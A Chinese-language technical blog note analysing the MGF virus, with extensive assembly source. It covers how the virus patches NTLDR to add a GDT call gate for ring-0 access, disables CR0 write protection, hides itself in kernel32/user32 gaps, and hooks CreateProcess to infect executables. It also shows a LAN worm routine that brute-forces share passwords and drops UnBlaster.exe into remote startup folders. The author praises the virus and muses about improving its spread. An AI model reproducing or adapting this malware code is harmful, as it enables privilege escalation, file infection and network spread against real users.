利用NTLDR进入RING0的方法及MGF病毒技术分析

利用NTLDR进入RING0的方法及MGF病毒技术分析
2010年08月02日
　　以前看了莫国防病毒的源代码。摸到了一个进入RING0的方法。今天又在EST论坛看到了代码，随手写一个笔记吧。其实wowocock已经提及过这个了。我就在简单的说说，各位就别拍我了。笔记而已。。。主要要说的就是病毒进入RING0的方法，虽然现在说起来MGF病毒进入RING0的方法，已经算老技术了，但是还是有必要了解它。病毒的其他方面也简单的描述一下，有很多巧妙之处，可以说是个“好”病毒。另外在说一下，我没有具体的去跟踪调试这个病毒
　　先说说进入RING0吧。
　　现在进入ring0的方法已经又不少了，例如sinister提出的利用驱动程序进入RING0的方法，还有WebCrazy提出的用读写物理内存的方法来读写GDT所在的物理内存，在GDT上生成自己的调用门来进入ring0，还有EVA提出的方法。还可以参考 http://www.eviloctal.com/forum/read.php?tid=10933&fpage=1 (wowocock写的总结，包括利用结构化异常处理以及利用中断门的方法进入RING0)。我所要说的是莫国防病毒所采用的方法，就是在NTLDR中搜寻GDT并找个空闲的地方添加CALLGATE。
　　上面我门说了，莫国防病毒采用的方法是在NTLDR中搜索GDT域的空闲区，创建调用门。NTLDR就是系统的引导过程中的重要角色,主要任务就是将x86 实模式转到win2k的保护模式下，还有装载Ntbootdd.sys文件等工作（WIN2K具体引导过程请参见《Windows2000引导过程》）.而其中也包括了装载GDT（全局描述符表）（装载GDT是在由实模式切换到保护模式之前的准备工作中就完成的）。也就是说，如果我们创建一个调用门，那么系统启动的时候就会将调用门装载。然后我们就可以利用这个CALLGATE来进入RING0了。
　　有人问过，用什么来确认NTLDR中包含有这个过程？关于这个问题，可以根据tombkeeper写的，调试NTLDR，来监视NTLDR在切换到保护模式的时候所做的一切。
　　下面我们来看看MGF病毒修改NTLDR添加CALLGATE的那段代码：
　　
　　_dwFlag-----bit 0:0=ntldr, 1=PE;bit 1:0=mem, 1=file;
　　bit 2:0=auto(ansi/unicode), 1=ansi
　　……………………
　　.else;_dwFlag ;如果是NTLDR文件，写入CALLGATE
　　lea esi,szGdtData[ebx]
　　mov edi,@lpFileMap
　　mov ecx,@dwFileSize
　　@@:
　　inc edi
　　push esi
　　push edi
　　push ecx
　　mov ecx,10h
　　repz cmpsb
　　pop ecx
　　pop edi
　　pop esi
　　loopnz @b
　　
　　在NTLDR中以16个字节为单位搜索RING0，CS，DS找到后EDI指向该数据的最后一个字节:说白了就是搜索GDT的特征。
　　
　　.if ZERO?
　　xor eax,eax
　　mov ecx,80h
　　@@:
　　sub edi,8
　　push edi
　　push ecx
　　mov ecx,8
　　repz scasb
　　pop ecx
　　pop edi
　　loopnz @b
　　
　　在向前的80H的范围内搜索NULL SELECTOR（8个0），其实没有必要，因为找到的SZGDTDATA前面就是了，所以最后EDI就指向NULL SELECTOR
　　
　　.if ZERO?
　　add edi,100h
　　lea esi,szCallGate[ebx]
　　mov ecx,10h
　　rep movsb
　　
　　在偏移100H处写入CALLGATE和自己的RING0，CS，这里有必要用自己RING0 CS，因为如果用系统的，SELECTOR虽然也可以，但在直接IO的时候有可能会出现0XE的页故障，也就是说如果加入破坏代码直接读写硬盘扇区，可能会出错。
　　
　　mov edx,dwC3Address[ebx]
　　mov word ptr [edi-16],dx
　　shr edx,16
　　mov word ptr [edi-10],dx
　　
　　使调用门指向ret的地址
　　.endif
　　.endif
　　dwC3Address是kernel32.dll中的地址，有人问为什么不用NTDLL.DLL中的呢？
　　kernel32.dll这个模块是所有程序默认加载的，而NTDLL.dll则不一样。dwC3Address是kernel32.dll中的指令ret地址。所以这个方法非常巧妙。
　　有些人问,为什么不用系统选择子08h所对应的描述符？
　　因为如果操作系统检测到描述符对应的代码和数据的地址都在0x80000000H以下运行的话，就会被认为是非法进入RING0，然后产生错误。所以我们要创建自己的描述符来保证不会出现这样的错误。
　　在WIN98下进入RING0用和CIH一样的技术，直接往GDT添加CALLGATE。这里就不说了。另外在2K下在修改NTLDT后需要重起才会生效。
　　下面来说说MGF病毒的其他部分。
　　来看看在RING0中，写KERNEL32和USER32的部分。
　　
　　;RING0
　　mov eax,esp
　　mov esp,[esp+4] ;切换堆栈 switch to ring3 esp
　　push eax ;save ring0 esp
　　mov eax,cr0
　　push eax ;CR0
　　btr eax,16
　　mov cr0,eax ;去掉kernel32模块只读内存页的写保护
　　mov eax,lpOldPE[ebx]
　　mov edx,dwOldEntry[ebx]
　　mov [eax+28h],edx
　　mov edx,dwOldImage[ebx]
　　mov [eax+50h],edx ;恢复进程的入口和映像大小，避过某些程序的自我保护
　　mov edi,hKernel32[ebx]
　　add edi,[edi+3ch]
　　mov edi,[edi+54h]
　　add edi,hKernel32[ebx]
　　mov lpMemPosition1[ebx],edi
　　lea esi,VirusStart[ebx]
　　mov ecx,10h
　　repz cmpsb ;判断病毒是否已经在内存
　　.if !ZERO? ;not in mem
　　.if dwVersion[ebx] ;不在内存 and win9x
　　push 0fh
　　push 0
　　push -1
　　push 0
　　push 0
　　push 0
　　push 1
　　push 1
　　@@:
　　int 20h ;vxd->_PageAllocate
　　dd 00010053h
　　add esp,8*4
　　lea edi,@b[ebx]
　　mov word ptr [edi],20cdh
　　mov dword ptr [edi+2],00010053h
　　.else
　　mov eax,hUser32[ebx]
　　add eax,[eax+3ch]
　　mov eax,[eax+54h]
　　add eax,hUser32[ebx] ;2000/XP/2003---》EAX=user32.dll模块的空隙
　　.endif
　　mov lpMemPosition2[ebx],eax
　　mov edi,lpMemPosition1[ebx]
　　add edi,offset _BeforeAPI-offset VirusStart
　　mov dword ptr [ebx+szNewCommand+1],edi ;
　　构造跳转入CreateProcess拦截函数的指令,
　　把HOOK CREATEPROCESS的指令地址放到第一段代码的后面
　　mov esi,dwCreateProcess[ebx]
　　push esi
　　lea edi,szOldCommand[ebx]
　　mov ecx,6
　　rep movsb ;保存原来CreateProcess函数的前6字节
　　lea esi,szNewCommand[ebx]
　　pop edi
　　mov ecx,6
　　rep movsb ;把CreateProcess函数的第一条指令改为跳入拦截函数的指令
　　lea esi,VirusStart[ebx]
　　mov edi,lpMemPosition1[ebx]
　　mov ecx,VirusSizeP1
　　rep movsb ;病毒前3K驻留在kernel32模块
　　mov edi,eax
　　mov ecx,VirusSizeP2
　　rep movsb ;病毒后2K驻留在user32模块或vxd _PageAllocate分到的页中
　　.endif
　　pop eax
　　mov cr0,eax ;恢复CR0
　　pop esp
　　lea eax,Ring3_1[ebx]
　　push eax
　　retf ;返回RING3
　　Ring3_1:
　　.endif
　　
　　病毒在kernel32.dll和user32.dll中找空隙并驻留其中。这样的话，任务管理器中就看不到病毒，更无法终止感染文件。
　　病毒还去除了kernel32的保护属性。这个方法当然很好。不过在退出的时候没有恢复，这样就会出问题的。在NT/2k/xp系统中，DLL所在页面被映射到进程的私有空间（如 Kernel32.dll 映射至77ED0000）中，并具有写时拷贝属性(cow)，也就是说没有进程试图写入该页面时，所有进程共享这个页面；而当一个进程试图写入该页面时，系统的页面错误处理代码将收到处理器的异常，并检查到该异常并非访问违例，同时分配给引发异常的进程一个新页面，并拷贝原页面内容于其上且更新进程的页表以指向新分配的页。这种共享内存的优化给病毒来了一定的麻烦，病毒不能象在WIN9X下那样仅修改Kernel32.dll一处代码便可一劳永逸。所以说如果在9X下，这样做没有问题。而在2K和XP下是不行的。这就是2K/XP的COW机制。当然还有一种方法可以对付它，就是修改CR0的WP位，不过别忘了恢复 ：）。
　　因为病毒要定位LoadLibraryA和GetProcAddress函数的地址。在这里病毒采用了拦截CreateProcess函数感染PE文件，也就很正常了。不过这样的感染方法还是很罕见的,与一般的病毒有所不同。可以说是MGF首创，如果以前有，就当我孤陋寡闻，尽情的拍死我吧。
　　下面是病毒创建的的局域网的线程
　　
　　_GoLAN proc lParam
　　local @hEnum
　　local @dwcCount
　　local @szResourceName[32]:byte
　　local @szBuffer[0c00h]:byte
　　ret
　　pushad
　　db 0e8h,0,0,0,0
　　pop ebx
　　sub ebx,$-1
　　lea eax,@hEnum
　　push eax
　　push 0
　　push 13h
　　push 0
　　push 5
　　call dwWNetOpenEnum[ebx]
　　.if !eax
　　.repeat
　　mov @dwcCount,-1
　　lea eax,dwBufferSize[ebx]
　　push eax
　　lea eax,@szBuffer
　　push eax
　　lea eax,@dwcCount
　　push eax
　　push @hEnum
　　call dwWNetEnumResource[ebx]
　　cmp dword ptr [@szBuffer+14h],0
　　jnz @f
　　.until eax
　　push @hEnum
　　call dwWNetCloseEnum[ebx]
　　.endif
　　jmp _GoLANexit
　　@@:
　　push @hEnum
　　call dwWNetCloseEnum[ebx]
　　lea edi,@szBuffer
　　_NextPC:
　　push edi
　　mov esi,[edi+14h]
　　lea edi,@szResourceName
　　@@:
　　lodsb
　　stosb
　　or al,al
　　jnz @b
　　mov dword ptr [edi-1],\'C\\\'
　　pop edi
　　xor eax,eax
　　mov dwPassword[ebx],eax
　　@@:
　　lea edx,szLocalDrive[ebx]
　　push edx
　　push eax
　　lea edx,@szResourceName
　　push edx
　　call dwWNetAddConnection[ebx]
　　.if eax==56h
　　call _GenPassWord
　　cmp dwPassword[ebx],0
　　jnz @b
　　.elseif !eax
　　push 0
　　lea eax,szDFile[ebx]
　　push eax
　　lea eax,szSFile[ebx]
　　push eax
　　call dwCopyFile[ebx] ;如果找到可写共享，感染
　　mov esi,eax
　　push 1
　　lea eax,szLocalDrive[ebx]
　　push eax
　　call dwWNetCancelConnection[ebx]
　　call _GenPassWord
　　or esi,esi
　　jz @b
　　.endif
　　add edi,20h
　　dec @dwcCount
　　jnz _NextPC
　　_GoLANexit:
　　popad
　　ret
　　_GoLAN endp
　　szMemToFileName db \'UnBlaster.exe\',0
　　szSFile db \'c:\\windows\\system\\UnBlaster.exe\',0
　　szDFile db \'X:\\WINDOWS\\All Users\\Start Menu\\Programs\\
　　启动\\UnBlaster.exe\',0 ;
　　从这里可以看出，把病毒复制到远程主机的启动文件中。
　　dwPassword dd 0
　　dd 0,0
　　szPassword db 0
　　szLocalDrive db \'x:\',0
　　dwBufferSize dd 0c00h
　　_GenPassWord:;生成密码的子程序，密码包括1234567890!@#$%^字符
　　std
　　pushad
　　lea edi,[ebx+szPassword-1]
　　xor edx,edx
　　mov eax,dwPassword[ebx]
　　mov ecx,16
　　@@:
　　div ecx
　　xchg eax,edx
　　.if al=6 && al<=15
　　add al,2ah
　　.endif
　　stosb
　　xor eax,eax
　　xchg eax,edx
　　or eax,eax
　　jnz @b
　　inc edi
　　inc dwPassword[ebx]
　　mov [esp+20h-4],edi
　　popad
　　cld
　　ret
　　
　　病毒在局域网传播方面就是靠破解远程主机共享密码（密码由病毒生成），把病毒复制到目标机器的启动文件夹中。当目标重起后病毒开始感染。我想如果在优化一下传播方式的话……